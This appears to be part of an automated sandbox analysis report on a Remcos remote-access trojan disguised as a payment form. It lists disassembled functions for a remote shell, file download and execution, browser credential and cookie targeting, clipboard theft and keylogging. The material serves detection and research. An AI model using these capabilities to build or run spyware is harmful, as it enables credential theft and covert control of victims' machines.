                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                              • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                              • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                              • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

                                              Non-executed Functions

                                              Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                              • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                              • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                              • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                              • API String ID: 3018269243-1736093966
                                              • Opcode ID: b08e6d8147c48ad56d9e449d8a64e86690144420b0335e728f1a7b964109e91d
                                              • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                              • Opcode Fuzzy Hash: b08e6d8147c48ad56d9e449d8a64e86690144420b0335e728f1a7b964109e91d
                                              • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                              Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                              • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                                • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                                • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                                • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                                • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                              • DeleteFileA.KERNEL32(?), ref: 0040768E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                              • API String ID: 1385304114-1507758755
                                              • Opcode ID: 4212707202319c9523e4f82c6f0df1e9ac7ca4435ef39e8a86c91b373024ad92
                                              • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                              • Opcode Fuzzy Hash: 4212707202319c9523e4f82c6f0df1e9ac7ca4435ef39e8a86c91b373024ad92
                                              • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                              Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 004056C6
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • __Init_thread_footer.LIBCMT ref: 00405703
                                              • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                              • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                              • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                              • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                              • CloseHandle.KERNEL32 ref: 00405A03
                                              • CloseHandle.KERNEL32 ref: 00405A0B
                                              • CloseHandle.KERNEL32 ref: 00405A1D
                                              • CloseHandle.KERNEL32 ref: 00405A25
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                              • String ID: SystemDrive$cmd.exe
                                              • API String ID: 2994406822-3633465311
                                              • Opcode ID: d90749906c699a264a83dd809c516440a47082a8c216af21d987cd76b0d6e669
                                              • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                              • Opcode Fuzzy Hash: d90749906c699a264a83dd809c516440a47082a8c216af21d987cd76b0d6e669
                                              • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                              Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                              • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                              • FindClose.KERNEL32(00000000), ref: 0040AC53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                              • API String ID: 1164774033-3681987949
                                              • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                              • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                              • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                              • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                              Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                              • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                              • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                              • FindClose.KERNEL32(00000000), ref: 0040AE11
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$File$FirstNext
                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 3527384056-432212279
                                              • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                              • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                              • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                              • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                              Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32 ref: 00414EC2
                                              • EmptyClipboard.USER32 ref: 00414ED0
                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                              • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                              • CloseClipboard.USER32 ref: 00414F55
                                              • OpenClipboard.USER32 ref: 00414F5C
                                              • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                              • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                              • CloseClipboard.USER32 ref: 00414F84
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                              • String ID:
                                              • API String ID: 3520204547-0
                                              • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                              • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                              • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                              • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                              Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$1$2$3$4$5$6$7
                                              • API String ID: 0-3177665633
                                              • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                              • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                              • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                              • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                              Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                              • GetLastError.KERNEL32 ref: 00418771
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                              • String ID:
                                              • API String ID: 3587775597-0
                                              • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                              • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                              • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                              • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                              Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                              • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                              • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 1164774033-405221262
                                              • Opcode ID: 732e7af7135910ff51b9ed5018c4d5526696ee878c57bff14cd179f8b8a647cb
                                              • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                              • Opcode Fuzzy Hash: 732e7af7135910ff51b9ed5018c4d5526696ee878c57bff14cd179f8b8a647cb
                                              • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                              Function 0041A01B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                                • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                              • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2341273852-0
                                              • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                              • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                              • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                              • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                              Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                              • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                              • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                                • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                              • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                              • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                                • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                                • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                              • String ID: $.F
                                              • API String ID: 3950776272-1421728423
                                              • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                              • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                              • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                              • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                              Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                              • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                              • GetLastError.KERNEL32 ref: 00409375
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                              • TranslateMessage.USER32(?), ref: 004093D2
                                              • DispatchMessageA.USER32(?), ref: 004093DD
                                              Strings
                                              • Keylogger initialization failure: error , xrefs: 00409389
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                              • String ID: Keylogger initialization failure: error
                                              • API String ID: 3219506041-952744263
                                              • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                              • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                              • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                              • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                              Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                              • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                              • API String ID: 2127411465-314212984
                                              • Opcode ID: 2b43a25140932724833c60cc0227af9bd2fbccba54ac5737bf4cc1b9c60871e3
                                              • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                              • Opcode Fuzzy Hash: 2b43a25140932724833c60cc0227af9bd2fbccba54ac5737bf4cc1b9c60871e3
                                              • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                              Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00446741
                                              • _free.LIBCMT ref: 00446765
                                              • _free.LIBCMT ref: 004468EC
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                              • _free.LIBCMT ref: 00446AB8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID:
                                              • API String ID: 314583886-0
                                              • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                              • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                              • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                              • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                              Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                                • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                              • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                              • ExitProcess.KERNEL32 ref: 0040E2B4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                              • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                              • API String ID: 2281282204-1386060931
                                              • Opcode ID: 3c32f36523e6925df0e1b9cd6565e243fede22dfd81d00af8e344aafa96c93a2
                                              • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                              • Opcode Fuzzy Hash: 3c32f36523e6925df0e1b9cd6565e243fede22dfd81d00af8e344aafa96c93a2
                                              • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                              Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                              • InternetCloseHandle.WININET(00000000), ref: 00419407
                                              • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                              Strings
                                              • http://geoplugin.net/json.gp, xrefs: 004193A2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$FileRead
                                              • String ID: http://geoplugin.net/json.gp
                                              • API String ID: 3121278467-91888290
                                              • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                              • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                              • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                              • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                              Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                              • GetLastError.KERNEL32 ref: 0040A999
                                              Strings
                                              • UserProfile, xrefs: 0040A95F
                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                              • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                              • API String ID: 2018770650-1062637481
